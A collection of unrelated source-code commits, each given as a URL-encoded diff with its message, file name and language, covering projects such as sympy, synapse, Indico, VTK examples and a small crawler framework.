-%22%22%22We add answer_tag if not in post because it gets an error in this%0A # method, this happens when question is not display so the answer_tag%0A # value is no on post dictionary%22%22%22%0A # if answer_tag not in post:%0A # post%5Banswer_tag%5D = ''%0A # return super(survey_question, self).validate_question
+''' Validate question, depending on question type and parameters '''%0A%0A input_answer_id = self.pool%5B'survey.user_input_line'%5D.search
(%0A
-#
cr
@@ -920,34 +920,32 @@
-
cr, uid,
question, p
@@ -936,1472 +936,514 @@
uid,
- question, post, answer_tag, context=context)%0A def validate_free_text(%0A self, cr, uid, question, post, answer_tag, context=None):%0A %22%22%22We add answer_tag if not in post because it gets an error in this%0A method, this happens when question is not display so the answer_tag%0A value is no on post
+%0A %5B('user_input_id.token', '=', post.get('token')),%0A ('question_id', '=', question.question_con
di
-c
tiona
-ry%22%22%22%0A if answer_tag not in post:%0A post%5Banswer_tag%5D = ''%0A return super(survey_question, self).validate_free_text(%0A cr, uid, question, post, answer_tag, context=context)%0A%0A def validate_textbox(%0A self, cr, uid, question, post, answer_tag, context=None):%0A %22%22%22We add answer_tag if not in post because it gets an error in this%0A method, this happens when question is not display so the answer_tag%0A value is no on post dictionary%22%22%22%0A if answer_tag not in post:%0A post%5Banswer_tag%5D = ''%0A return super(survey_question, self).validate_textbox(%0A cr, uid, question, post, answer_tag, context=context)%0A%0A def validate_numerical_box(%0A self, cr, uid, question, post, answer_tag, context=None):%0A %22%22%22We add answer_tag if not in post because it gets an error in this%0A method, this happens when question is not display so the answer_tag%0A value is no on post dictionary%22%22%22%0A if answer_tag not in post:%0A post%5Banswer_tag%5D = ''%0A return super(survey_question, self).validate_numerical_box(%0A
+l_id.id)%5D)%0A try:%0A checker = getattr(self, 'validate_' + question.type)%0A except AttributeError:%0A _logger.warning(%0A question.type + %22: This type of question has no validation method%22)%0A return %7B%7D%0A else:%0A if question.conditional and question.answer_id != self.pool%5B'survey.user_input_line'%5D.browse(%0A
@@ -1447,32 +1447,33 @@
+
cr, uid,
question, p
@@ -1464,380 +1464,105 @@
uid,
- question, post, answer_tag, context=context)%0A%0A def validate_datetime(%0A self, cr, uid, question, post, answer_tag, context=None):%0A %22%22%22We add answer_tag if not in post because it gets an error in this%0A method, this happens when question is not display so the answer_tag%0A value is no on post dictionary%22%22%22%0A if answer_tag not in post
+%0A input_answer_id).value_suggested:%0A return %7B%7D%0A else
:%0A
@@ -1572,109 +1572,30 @@
-
- post%5Banswer_tag%5D = ''%0A
-
return
-super(survey_question, self).validate_datetime(%0A
+checker(
cr,
|
f6be438e01a499dc2bde6abfa5a00fb281db7b83
|
Add account_id as the element of this class
|
kamboo/core.py
|
kamboo/core.py
|
import botocore
from kotocore.session import Session
class KambooConnection(object):
"""
Kamboo connection with botocore session initialized
"""
session = botocore.session.get_session()
def __init__(self, service_name="ec2", region_name="us-east-1",
credentials=None):
self.region = region_name
self.credentials = credentials
if self.credentials:
self.session.set_credentials(**self.credentials)
Connection = Session(session=self.session).get_connection(service_name)
self.conn = Connection(region_name=self.region)
|
Python
| 0.000001
|
@@ -267,16 +267,50 @@
ast-1%22,%0A
+ account_id=None,%0A
@@ -371,16 +371,53 @@
on_name%0A
+ self.account_id = account_id%0A
|
a76b866862874ce52c762b4e0381b233917a977a
|
Increment version
|
karld/_meta.py
|
karld/_meta.py
|
version_info = (0, 2, 6)
version = '.'.join(map(str, version_info))
|
Python
| 0.000002
|
@@ -19,9 +19,9 @@
2,
-6
+7
)%0Ave
|
8868f2715e4e2d0c2554af4d7b08074574c9543f
|
Adopt RoundFunction class to work around (real*I).is_real is None
|
sympy/functions/elementary/integers.py
|
sympy/functions/elementary/integers.py
|
from __future__ import print_function, division
from sympy.core.basic import C
from sympy.core.singleton import S
from sympy.core.function import Function
from sympy.core import Add
from sympy.core.evalf import get_integer_part, PrecisionExhausted
###############################################################################
######################### FLOOR and CEILING FUNCTIONS #########################
###############################################################################
class RoundFunction(Function):
"""The base class for rounding functions."""
@classmethod
def eval(cls, arg):
if arg.is_integer:
return arg
if arg.is_imaginary:
return cls(C.im(arg))*S.ImaginaryUnit
v = cls._eval_number(arg)
if v is not None:
return v
# Integral, numerical, symbolic part
ipart = npart = spart = S.Zero
# Extract integral (or complex integral) terms
terms = Add.make_args(arg)
for t in terms:
if t.is_integer or (t.is_imaginary and C.im(t).is_integer):
ipart += t
elif t.has(C.Symbol):
spart += t
else:
npart += t
if not (npart or spart):
return ipart
# Evaluate npart numerically if independent of spart
if npart and (
not spart or
npart.is_real and spart.is_imaginary or
npart.is_imaginary and spart.is_real):
try:
re, im = get_integer_part(
npart, cls._dir, {}, return_ints=True)
ipart += C.Integer(re) + C.Integer(im)*S.ImaginaryUnit
npart = S.Zero
except (PrecisionExhausted, NotImplementedError):
pass
spart = npart + spart
if not spart:
return ipart
elif spart.is_imaginary:
return ipart + cls(C.im(spart), evaluate=False)*S.ImaginaryUnit
else:
return ipart + cls(spart, evaluate=False)
def _eval_is_bounded(self):
return self.args[0].is_bounded
def _eval_is_real(self):
return self.args[0].is_real
def _eval_is_integer(self):
return self.args[0].is_real
class floor(RoundFunction):
"""
Floor is a univariate function which returns the largest integer
value not greater than its argument. However this implementation
generalizes floor to complex numbers.
More information can be found in "Concrete mathematics" by Graham,
pp. 87 or visit http://mathworld.wolfram.com/FloorFunction.html.
>>> from sympy import floor, E, I, Float, Rational
>>> floor(17)
17
>>> floor(Rational(23, 10))
2
>>> floor(2*E)
5
>>> floor(-Float(0.567))
-1
>>> floor(-I/2)
-I
See Also
========
ceiling
"""
_dir = -1
@classmethod
def _eval_number(cls, arg):
if arg.is_Number:
if arg.is_Rational:
return C.Integer(arg.p // arg.q)
elif arg.is_Float:
return C.Integer(int(arg.floor()))
else:
return arg
if arg.is_NumberSymbol:
return arg.approximation_interval(C.Integer)[0]
def _eval_nseries(self, x, n, logx):
r = self.subs(x, 0)
args = self.args[0]
args0 = args.subs(x, 0)
if args0 == r:
direction = (args - args0).leadterm(x)[0]
if direction.is_positive:
return r
else:
return r - 1
else:
return r
class ceiling(RoundFunction):
"""
Ceiling is a univariate function which returns the smallest integer
value not less than its argument. Ceiling function is generalized
in this implementation to complex numbers.
More information can be found in "Concrete mathematics" by Graham,
pp. 87 or visit http://mathworld.wolfram.com/CeilingFunction.html.
>>> from sympy import ceiling, E, I, Float, Rational
>>> ceiling(17)
17
>>> ceiling(Rational(23, 10))
3
>>> ceiling(2*E)
6
>>> ceiling(-Float(0.567))
0
>>> ceiling(I/2)
I
See Also
========
floor
"""
_dir = 1
@classmethod
def _eval_number(cls, arg):
if arg.is_Number:
if arg.is_Rational:
return -C.Integer(-arg.p // arg.q)
elif arg.is_Float:
return C.Integer(int(arg.ceiling()))
else:
return arg
if arg.is_NumberSymbol:
return arg.approximation_interval(C.Integer)[1]
def _eval_nseries(self, x, n, logx):
r = self.subs(x, 0)
args = self.args[0]
args0 = args.subs(x, 0)
if args0 == r:
direction = (args - args0).leadterm(x)[0]
if direction.is_positive:
return r + 1
else:
return r
else:
return r
|
Python
| 0.999728
|
@@ -676,32 +676,65 @@
arg.is_imaginary
+ or (S.ImaginaryUnit*arg).is_real
:%0A re
@@ -1452,24 +1452,25 @@
is_real and
+(
spart.is_ima
@@ -1478,16 +1478,52 @@
inary or
+ (S.ImaginaryUnit*spart).is_real) or
%0A
@@ -1983,16 +1983,51 @@
maginary
+ or (S.ImaginaryUnit*spart).is_real
:%0A
|
31d7df470dbaf996f4f3c7639107ec04afda1ec4
|
Update runcount.py
|
bin/runcount.py
|
bin/runcount.py
|
#!/usr/bin/python
import os
from count import countfile
import common
def runAll(args):
print('\n\n\nYou have requested to count unique sam files')
print('\tWARNING:')
print('\t\tIF USING ANY REFERENCES OTHER THAN THOSE I PROVIDE I CANNOT GUARANTEE RESULT ACCURACY')
print('\n')
#set up environment#
args.SamDirectory = common.fixDirName(args.SamDirectory)
countDir = os.path.dirname(args.SamDirectory[:-1]) + '/' + BinCounts + '/'
if args.output:
countDir = common.fixDirName(args.output)
statsDir = os.path.dirname(args.SamDirectory[:-1]) + '/' + PipelineStats + '/'
if args.statdir:
statsDir = common.fixDirName(args.statdir)
for i in [countDir, statsDir]:
common.makeDir(i)
samFiles = common.getSampleList(args.SamDirectory, args.samples, 'sam')
#run multiprocessing of all mapping commands#
argList = [(x, countDir, statsDir, args.species) for x in samFiles]
common.daemon(countfile.runOne, argList, 'count sam files')
print('\nBin counts complete\n\n\n')
|
Python
| 0.000001
|
@@ -831,12 +831,17 @@
all
-mapp
+bin count
ing
|
e6520bb2c2f016f39ae76bfb15dd62cfdb2fdf63
|
update rcomp CLI index printing, given new serv format
|
frontend/rcomp/cli.py
|
frontend/rcomp/cli.py
|
"""command-line interface (CLI)
For local development, use the `--rcomp-server` switch to direct this
client at the localhost. E.g.,
rcomp --rcomp-server http://127.0.0.1:8000
"""
import argparse
import sys
import json
import requests
from . import __version__
def main(argv=None):
parser = argparse.ArgumentParser(prog='rcomp', add_help=False)
parser.add_argument('--rcomp-help', action='store_true',
dest='show_help',
help='print this help message and exit')
parser.add_argument('--rcomp-version', action='store_true',
dest='show_version',
help='print version number and exit')
parser.add_argument('--rcomp-server', metavar='URI',
dest='base_uri',
help=('base URI for job requests.'
' (default is https://api.fmtools.org)'))
parser.add_argument('--rcomp-nonblocking', action='store_true',
dest='nonblocking', default=False,
help=('Default behavior is to wait for remote job'
' to complete. Use this switch to immediately'
' return after job successfully starts.'))
parser.add_argument('--rcomp-continue', metavar='JOBID',
dest='job_id', default=None, nargs='?',
help='')
parser.add_argument('COMMAND', nargs='?')
parser.add_argument('ARGV', nargs=argparse.REMAINDER)
if argv is None:
args = parser.parse_args()
else:
args = parser.parse_args(argv)
if args.show_help:
parser.print_help()
return 0
if args.show_version:
print('rcomp '+__version__)
return 0
if args.base_uri is None:
base_uri = 'https://api.fmtools.org'
else:
base_uri = args.base_uri
if args.COMMAND is None:
res = requests.get(base_uri+'/')
if res.ok:
index = json.loads(res.text)
assert 'commands' in index
print('The following commands are available at {}'
.format(base_uri))
for cmd in index['commands']:
print('{NAME} {SUMMARY}'
.format(NAME=cmd['name'], SUMMARY=cmd['summary']))
else:
res = requests.get(base_uri+'/' + args.COMMAND)
if res.ok:
print(res.text)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
Python
| 0
|
@@ -2218,16 +2218,25 @@
mmands'%5D
+.values()
:%0A
|
710dc66b04b5864fc4321e273eada1cce202c9cf
|
Refactor LineOnMesh.py
|
src/Python/DataManipulation/LineOnMesh.py
|
src/Python/DataManipulation/LineOnMesh.py
|
#!/usr/bin/env python
import vtk
import random
import numpy
# Make a 32 x 32 grid
size = 32
# Define z values for the topography
topography = numpy.zeros([size, size])
for i in range(size):
for j in range(size):
topography[i][j] = random.randrange(0, 5)
# Define points, triangles and colors
colors = vtk.vtkUnsignedCharArray()
colors.SetNumberOfComponents(3)
points = vtk.vtkPoints()
triangles = vtk.vtkCellArray()
# Build the meshgrid manually
count = 0
for i in range(size - 1):
for j in range(size - 1):
z1 = topography[i][j]
z2 = topography[i][j + 1]
z3 = topography[i + 1][j]
# Triangle 1
points.InsertNextPoint(i, j, z1)
points.InsertNextPoint(i, (j + 1), z2)
points.InsertNextPoint((i + 1), j, z3)
triangle = vtk.vtkTriangle()
triangle.GetPointIds().SetId(0, count)
triangle.GetPointIds().SetId(1, count + 1)
triangle.GetPointIds().SetId(2, count + 2)
triangles.InsertNextCell(triangle)
z1 = topography[i][j + 1]
z2 = topography[i + 1][j + 1]
z3 = topography[i + 1][j]
# Triangle 2
points.InsertNextPoint(i, (j + 1), z1)
points.InsertNextPoint((i + 1), (j + 1), z2)
points.InsertNextPoint((i + 1), j, z3)
triangle = vtk.vtkTriangle()
triangle.GetPointIds().SetId(0, count + 3)
triangle.GetPointIds().SetId(1, count + 4)
triangle.GetPointIds().SetId(2, count + 5)
count += 6
triangles.InsertNextCell(triangle)
# Add some color
r = [int(i / float(size) * 255), int(j / float(size) * 255), 0]
colors.InsertNextTypedTuple(r)
colors.InsertNextTypedTuple(r)
colors.InsertNextTypedTuple(r)
colors.InsertNextTypedTuple(r)
colors.InsertNextTypedTuple(r)
colors.InsertNextTypedTuple(r)
# Create a polydata object
trianglePolyData = vtk.vtkPolyData()
# Add the geometry and topology to the polydata
trianglePolyData.SetPoints(points)
trianglePolyData.GetPointData().SetScalars(colors)
trianglePolyData.SetPolys(triangles)
# Clean the polydata so that the edges are shared !
cleanPolyData = vtk.vtkCleanPolyData()
cleanPolyData.SetInputData(trianglePolyData)
# Use a filter to smooth the data (will add triangles and smooth)
smooth_loop = vtk.vtkLoopSubdivisionFilter()
smooth_loop.SetNumberOfSubdivisions(3)
smooth_loop.SetInputConnection(cleanPolyData.GetOutputPort())
# Create a mapper and actor for smoothed dataset
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(smooth_loop.GetOutputPort())
actor_loop = vtk.vtkActor()
actor_loop.SetMapper(mapper)
actor_loop.GetProperty().SetInterpolationToFlat()
# Update the pipeline so that vtkCellLocator finds cells !
smooth_loop.Update()
# Define a cellLocator to be able to compute intersections between lines
# and the surface
locator = vtk.vtkCellLocator()
locator.SetDataSet(smooth_loop.GetOutput())
locator.BuildLocator()
maxloop = 1000
dist = 20.0 / maxloop
tolerance = 0.001
# Make a list of points. Each point is the intersection of a vertical line
# defined by p1 and p2 and the surface.
points = vtk.vtkPoints()
for i in range(maxloop):
p1 = [2 + i * dist, 16, -1]
p2 = [2 + i * dist, 16, 6]
# Outputs (we need only pos which is the x, y, z position
# of the intersection)
t = vtk.mutable(0)
pos = [0.0, 0.0, 0.0]
pcoords = [0.0, 0.0, 0.0]
subId = vtk.mutable(0)
locator.IntersectWithLine(p1, p2, tolerance, t, pos, pcoords, subId)
# Add a slight offset in z
pos[2] += 0.01
# Add the x, y, z position of the intersection
points.InsertNextPoint(pos)
# Create a spline and add the points
spline = vtk.vtkParametricSpline()
spline.SetPoints(points)
functionSource = vtk.vtkParametricFunctionSource()
functionSource.SetUResolution(maxloop)
functionSource.SetParametricFunction(spline)
# Map the spline
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(functionSource.GetOutputPort())
# Define the line actor
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetColor([1.0, 0.0, 0.0])
actor.GetProperty().SetLineWidth(3)
# Visualize
renderer = vtk.vtkRenderer()
renderWindow = vtk.vtkRenderWindow()
renderWindow.AddRenderer(renderer)
renderWindowInteractor = vtk.vtkRenderWindowInteractor()
renderWindowInteractor.SetRenderWindow(renderWindow)
# Add actors and render
renderer.AddActor(actor)
renderer.AddActor(actor_loop)
renderer.SetBackground(1, 1, 1) # Background color white
renderWindow.SetSize(800, 800)
renderWindow.Render()
renderWindowInteractor.Start()
|
Python
| 0.000001
|
@@ -38,27 +38,19 @@
ort
-random%0Aimport numpy
+numpy as np
%0A%0A%0A#
@@ -122,143 +122,103 @@
phy%0A
-topography = numpy.zeros(%5Bsize, size%5D)%0Afor i in range(size):%0A for j in range(size):%0A topography%5Bi%5D%5Bj%5D = random.randrange(0, 5
+z_min = 0%0Az_max = 5%0Atopography = (z_max * np.random.random_sample((size, size)) + z_min).round(
)%0A%0A#
|
c4a0a83fe4a028b1d571058aed755be5b4714531
|
fix logging
|
includes/SteamGroupMembers.py
|
includes/SteamGroupMembers.py
|
import logging
import urllib2
import xml.etree.ElementTree as ElementTree
logger = logging.getLogger()
class SteamGroupMembers(object):
"""
Retrives all members of the specified group.
"""
_members = None
def __init__(self, group_id):
self._group_id = group_id
def __len__(self):
return len(self._get_members())
def __contains__(self, item):
return item in self._get_members()
def __iter__(self):
return self._get_members().__iter__()
def _get_members(self):
if self._members is None:
self._members = []
url = 'http://steamcommunity.com/gid/%s/memberslistxml/?xml=1' % self._group_id
while True:
logger.debug('Requesting %s', url)
responce = urllib2.urlopen(url)
xml = ElementTree.parse(responce).getroot()
members_elements = xml.findall('members/steamID64')
logger.info('Found %d members in group %d', len(members_elements), self._group_id)
members = map(lambda e: e.text, members_elements)
self._members.extend(members)
next_page = xml.find('nextPageLink')
if next_page is not None:
logger.debug('Found next page link')
url = next_page.text
else:
break
return self._members
|
Python
| 0.000002
|
@@ -701,70 +701,83 @@
-while True:%0A logger.debug('Requesting %25s', url)
+logger.debug('Loading steam group members %25s', url)%0A while True:
%0A
@@ -953,106 +953,8 @@
4')%0A
- logger.info('Found %25d members in group %25d', len(members_elements), self._group_id)
%0A
@@ -1181,44 +1181,28 @@
-logger.debug('Found
+url =
next
-
+_
page
- link')
+.text
%0A
@@ -1218,36 +1218,79 @@
-url =
+logger.debug('Loading steam group members (
next
-_
+
page
-.text
+) %25s', url)
%0A
@@ -1330,16 +1330,109 @@
break%0A
+ logger.debug('Found %25d members in group %25s', len(self._members), self._group_id)%0A
|
3b2dcfff78d5c330937c4b75f34f79f8e991d8e3
|
Fix logging bug in EDU handling over replication
|
synapse/replication/http/federation.py
|
synapse/replication/http/federation.py
|
# -*- coding: utf-8 -*-
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from twisted.internet import defer
from synapse.events import FrozenEvent
from synapse.events.snapshot import EventContext
from synapse.http.servlet import parse_json_object_from_request
from synapse.replication.http._base import ReplicationEndpoint
from synapse.util.metrics import Measure
logger = logging.getLogger(__name__)
class ReplicationFederationSendEventsRestServlet(ReplicationEndpoint):
"""Handles events newly received from federation, including persisting and
notifying.
The API looks like:
POST /_synapse/replication/fed_send_events/:txn_id
{
"events": [{
"event": { .. serialized event .. },
"internal_metadata": { .. serialized internal_metadata .. },
"rejected_reason": .., // The event.rejected_reason field
"context": { .. serialized event context .. },
}],
"backfilled": false
"""
NAME = "fed_send_events"
PATH_ARGS = ()
def __init__(self, hs):
super(ReplicationFederationSendEventsRestServlet, self).__init__(hs)
self.store = hs.get_datastore()
self.clock = hs.get_clock()
self.federation_handler = hs.get_handlers().federation_handler
@staticmethod
@defer.inlineCallbacks
def _serialize_payload(store, event_and_contexts, backfilled):
"""
Args:
store
event_and_contexts (list[tuple[FrozenEvent, EventContext]])
backfilled (bool): Whether or not the events are the result of
backfilling
"""
event_payloads = []
for event, context in event_and_contexts:
serialized_context = yield context.serialize(event, store)
event_payloads.append({
"event": event.get_pdu_json(),
"internal_metadata": event.internal_metadata.get_dict(),
"rejected_reason": event.rejected_reason,
"context": serialized_context,
})
payload = {
"events": event_payloads,
"backfilled": backfilled,
}
defer.returnValue(payload)
@defer.inlineCallbacks
def _handle_request(self, request):
with Measure(self.clock, "repl_fed_send_events_parse"):
content = parse_json_object_from_request(request)
backfilled = content["backfilled"]
event_payloads = content["events"]
event_and_contexts = []
for event_payload in event_payloads:
event_dict = event_payload["event"]
internal_metadata = event_payload["internal_metadata"]
rejected_reason = event_payload["rejected_reason"]
event = FrozenEvent(event_dict, internal_metadata, rejected_reason)
context = yield EventContext.deserialize(
self.store, event_payload["context"],
)
event_and_contexts.append((event, context))
logger.info(
"Got %d events from federation",
len(event_and_contexts),
)
yield self.federation_handler.persist_events_and_notify(
event_and_contexts, backfilled,
)
defer.returnValue((200, {}))
class ReplicationFederationSendEduRestServlet(ReplicationEndpoint):
"""Handles EDUs newly received from federation, including persisting and
notifying.
Request format:
POST /_synapse/replication/fed_send_edu/:edu_type/:txn_id
{
"origin": ...,
"content: { ... }
}
"""
NAME = "fed_send_edu"
PATH_ARGS = ("edu_type",)
def __init__(self, hs):
super(ReplicationFederationSendEduRestServlet, self).__init__(hs)
self.store = hs.get_datastore()
self.clock = hs.get_clock()
self.registry = hs.get_federation_registry()
@staticmethod
def _serialize_payload(edu_type, origin, content):
return {
"origin": origin,
"content": content,
}
@defer.inlineCallbacks
def _handle_request(self, request, edu_type):
with Measure(self.clock, "repl_fed_send_edu_parse"):
content = parse_json_object_from_request(request)
origin = content["origin"]
edu_content = content["content"]
logger.info(
"Got %r edu from $s",
edu_type, origin,
)
result = yield self.registry.on_edu(edu_type, origin, edu_content)
defer.returnValue((200, result))
class ReplicationGetQueryRestServlet(ReplicationEndpoint):
"""Handle responding to queries from federation.
Request format:
POST /_synapse/replication/fed_query/:query_type
{
"args": { ... }
}
"""
NAME = "fed_query"
PATH_ARGS = ("query_type",)
# This is a query, so let's not bother caching
CACHE = False
def __init__(self, hs):
super(ReplicationGetQueryRestServlet, self).__init__(hs)
self.store = hs.get_datastore()
self.clock = hs.get_clock()
self.registry = hs.get_federation_registry()
@staticmethod
def _serialize_payload(query_type, args):
"""
Args:
query_type (str)
args (dict): The arguments received for the given query type
"""
return {
"args": args,
}
@defer.inlineCallbacks
def _handle_request(self, request, query_type):
with Measure(self.clock, "repl_fed_query_parse"):
content = parse_json_object_from_request(request)
args = content["args"]
logger.info(
"Got %r query",
query_type,
)
result = yield self.registry.on_query(query_type, args)
defer.returnValue((200, result))
class ReplicationCleanRoomRestServlet(ReplicationEndpoint):
"""Called to clean up any data in DB for a given room, ready for the
server to join the room.
Request format:
POST /_synapse/replication/fed_query/:fed_cleanup_room/:txn_id
{}
"""
NAME = "fed_cleanup_room"
PATH_ARGS = ("room_id",)
def __init__(self, hs):
super(ReplicationCleanRoomRestServlet, self).__init__(hs)
self.store = hs.get_datastore()
@staticmethod
def _serialize_payload(room_id, args):
"""
Args:
room_id (str)
"""
return {}
@defer.inlineCallbacks
def _handle_request(self, request, room_id):
yield self.store.clean_room_for_join(room_id)
defer.returnValue((200, {}))
def register_servlets(hs, http_server):
ReplicationFederationSendEventsRestServlet(hs).register(http_server)
ReplicationFederationSendEduRestServlet(hs).register(http_server)
ReplicationGetQueryRestServlet(hs).register(http_server)
ReplicationCleanRoomRestServlet(hs).register(http_server)
|
Python
| 0
|
@@ -5019,9 +5019,9 @@
rom
-$
+%25
s%22,%0A
|
ff0f3b359e4de08cfdc20eede28bf6f02705f211
|
Fix admin account creation dialog
|
indico/modules/users/forms.py
|
indico/modules/users/forms.py
|
# This file is part of Indico.
# Copyright (C) 2002 - 2022 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
from operator import itemgetter
from pytz import common_timezones, common_timezones_set
from wtforms.fields import BooleanField, EmailField, IntegerField, SelectField, StringField
from wtforms.validators import DataRequired, Email, NumberRange, ValidationError
from indico.core.config import config
from indico.modules.auth.forms import LocalRegistrationForm, _check_existing_email
from indico.modules.users import User
from indico.modules.users.models.emails import UserEmail
from indico.modules.users.models.users import NameFormat
from indico.util.i18n import _, get_all_locales
from indico.web.forms.base import IndicoForm
from indico.web.forms.fields import IndicoEnumSelectField, MultiStringField, PrincipalField, PrincipalListField
from indico.web.forms.util import inject_validators
from indico.web.forms.validators import HiddenUnless
from indico.web.forms.widgets import SwitchWidget
class UserPreferencesForm(IndicoForm):
lang = SelectField(_('Language'))
timezone = SelectField(_('Timezone'))
force_timezone = BooleanField(
_('Use my timezone'),
widget=SwitchWidget(),
description=_("Always use my current timezone instead of an event's timezone."))
show_future_events = BooleanField(
_('Show future events'),
widget=SwitchWidget(),
description=_('Show future events by default.'))
show_past_events = BooleanField(
_('Show past events'),
widget=SwitchWidget(),
description=_('Show past events by default.'))
name_format = IndicoEnumSelectField(_('Name format'), enum=NameFormat,
description=_('Default format in which names are displayed'))
use_previewer_pdf = BooleanField(
_('Use previewer for PDF files'),
widget=SwitchWidget(),
description=_('The previewer is used by default for image and text files, but not for PDF files.'))
add_ical_alerts = BooleanField(
_('Add alerts to iCal'),
widget=SwitchWidget(),
description=_('Add an event reminder to exported iCal files/URLs.'))
add_ical_alerts_mins = IntegerField(
_('iCal notification time'),
[HiddenUnless('add_ical_alerts'), NumberRange(min=0)],
description=_('Number of minutes to notify before an event.'))
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
locales = [(code, f'{name} ({territory})' if territory else name)
for code, (name, territory, __) in get_all_locales().items()]
self.lang.choices = sorted(locales, key=itemgetter(1))
self.timezone.choices = list(zip(common_timezones, common_timezones))
if self.timezone.object_data and self.timezone.object_data not in common_timezones_set:
self.timezone.choices.append((self.timezone.object_data, self.timezone.object_data))
class UserEmailsForm(IndicoForm):
email = EmailField(_('Add new email address'), [DataRequired(), Email()], filters=[lambda x: x.lower() if x else x])
def validate_email(self, field):
conflict = (UserEmail.query
.filter(~User.is_pending,
~UserEmail.is_user_deleted,
UserEmail.email == field.data)
.join(User)
.has_rows())
if conflict:
raise ValidationError(_('This email address is already in use.'))
class SearchForm(IndicoForm):
last_name = StringField(_('Family name'))
first_name = StringField(_('First name'))
email = StringField(_('Email'), filters=[lambda x: x.lower() if x else x])
affiliation = StringField(_('Affiliation'))
exact = BooleanField(_('Exact match'))
include_deleted = BooleanField(_('Include deleted'))
include_pending = BooleanField(_('Include pending'))
external = BooleanField(_('External'))
class MergeForm(IndicoForm):
source_user = PrincipalField(_('Source user'), [DataRequired()],
description=_('The user that will be merged into the target one'))
target_user = PrincipalField(_('Target user'), [DataRequired()],
description=_('The user that will remain active in the end'))
class AdminUserSettingsForm(IndicoForm):
notify_account_creation = BooleanField(_('Registration notifications'), widget=SwitchWidget(),
description=_('Send an email to all administrators whenever someone '
'registers a new local account.'))
email_blacklist = MultiStringField(_('Email blacklist'), field=('email_blacklist', _('email')),
unique=True, flat=True,
description=_('Prevent users from creating Indico accounts with these email '
'addresses. Supports wildcards, e.g. *@gmail.com'))
allow_personal_tokens = BooleanField(_('Personal API tokens'), widget=SwitchWidget(),
description=_('Whether users are allowed to generate personal API tokens. '
'If disabled, only admins can create them, but users will '
'still be able to regenerate the tokens assigned to them.'))
class AdminAccountRegistrationForm(LocalRegistrationForm):
email = EmailField(_('Email address'), [DataRequired(), Email(), _check_existing_email],
filters=[lambda s: s.lower() if s else s])
create_identity = BooleanField(_('Set login details'), widget=SwitchWidget(), default=True)
def __init__(self, *args, **kwargs):
if config.LOCAL_IDENTITIES:
for field in ('username', 'password', 'confirm_password'):
inject_validators(self, field, [HiddenUnless('create_identity')], early=True)
super().__init__(*args, **kwargs)
del self.comment
if not config.LOCAL_IDENTITIES:
del self.username
del self.password
del self.confirm_password
del self.create_identity
class AdminsForm(IndicoForm):
admins = PrincipalListField(_('Admins'), [DataRequired()])
|
Python
| 0
|
@@ -6235,33 +6235,8 @@
gs)%0A
- del self.comment%0A
|
ab4d375010220c4dac97116e2f1bffeca2f0bedc
|
use another handler for user-created redirecting to fix up the test.
|
brownant/app.py
|
brownant/app.py
|
from __future__ import absolute_import, unicode_literals
from six import string_types
from six.moves import urllib
from werkzeug.utils import import_string
from werkzeug.urls import url_decode, url_encode
from werkzeug.routing import Map, Rule, NotFound, RequestRedirect
from .request import Request
from .exceptions import NotSupported
from .utils import to_bytes_safe
class BrownAnt(object):
"""The app which could manage whole crawler system."""
def __init__(self):
self.url_map = Map(strict_slashes=False, host_matching=True,
redirect_defaults=False)
def add_url_rule(self, host, rule_string, endpoint, **options):
"""Add a url rule to the app instance.
The url rule is the same with Flask apps and other Werkzeug apps.
:param host: the matched hostname. e.g. "www.python.org"
:param rule_string: the matched path pattern. e.g. "/news/<int:id>"
:param endpoint: the endpoint name as a dispatching key such as the
qualified name of the object.
"""
rule = Rule(rule_string, host=host, endpoint=endpoint, **options)
self.url_map.add(rule)
def parse_url(self, url_string):
"""Parse the URL string with the url map of this app instance.
:param url_string: the origin URL string.
:returns: the tuple as `(url, url_adapter, query_args)`, the url is
parsed by the standard library `urlparse`, the url_adapter is
from the werkzeug bound URL map, the query_args is a
multidict from the werkzeug.
"""
url = urllib.parse.urlparse(url_string)
url = self.validate_url(url)
url_adapter = self.url_map.bind(server_name=url.hostname,
url_scheme=url.scheme,
path_info=url.path)
query_args = url_decode(url.query)
return url, url_adapter, query_args
def validate_url(self, url):
"""Validate the :class:`~urllib.parse.ParseResult` object.
This method will make sure the :meth:`~brownant.app.BrownAnt.parse_url`
could work as expected even meet a unexpected URL string.
:param url: the parsed url.
:type url: :class:`~urllib.parse.ParseResult`
"""
# fix up the non-ascii path
url_path = to_bytes_safe(url.path)
url_path = urllib.parse.quote(url_path, safe=b"/%")
url = urllib.parse.ParseResult(url.scheme, url.netloc, url_path,
url.params, url.query, url.fragment)
# validate the components of URL
has_hostname = url.hostname is not None and len(url.hostname) > 0
has_http_scheme = url.scheme in ("http", "https")
has_path = not len(url.path) or url.path.startswith("/")
if not (has_hostname and has_http_scheme and has_path):
raise NotSupported("invalid url: %s" % repr(url))
return url
def dispatch_url(self, url_string):
"""Dispatch the URL string to the target endpoint function.
:param url_string: the origin URL string.
:returns: the return value of calling dispatched function.
"""
url, url_adapter, query_args = self.parse_url(url_string)
try:
endpoint, kwargs = url_adapter.match()
handler = import_string(endpoint)
request = Request(url=url, args=query_args)
return handler(request, **kwargs)
except NotFound:
raise NotSupported(url_string)
except RequestRedirect as e:
new_url = "{0.new_url}?{1}".format(e, url_encode(query_args))
return self.dispatch_url(new_url)
def mount_site(self, site):
"""Mount a supported site to this app instance.
:param site: the site instance be mounted.
"""
if isinstance(site, string_types):
site = import_string(site)
site.play_actions(target=self)
def redirect(url):
"""Raise the :class:`~werkzeug.routing.RequestRedirect` exception to lead
the app dispatching current request to another URL.
:param url: the target URL.
"""
raise RequestRedirect(url)
|
Python
| 0
|
@@ -3383,156 +3383,8 @@
h()%0A
- handler = import_string(endpoint)%0A request = Request(url=url, args=query_args)%0A return handler(request, **kwargs)%0A
@@ -3605,16 +3605,263 @@
w_url)%0A%0A
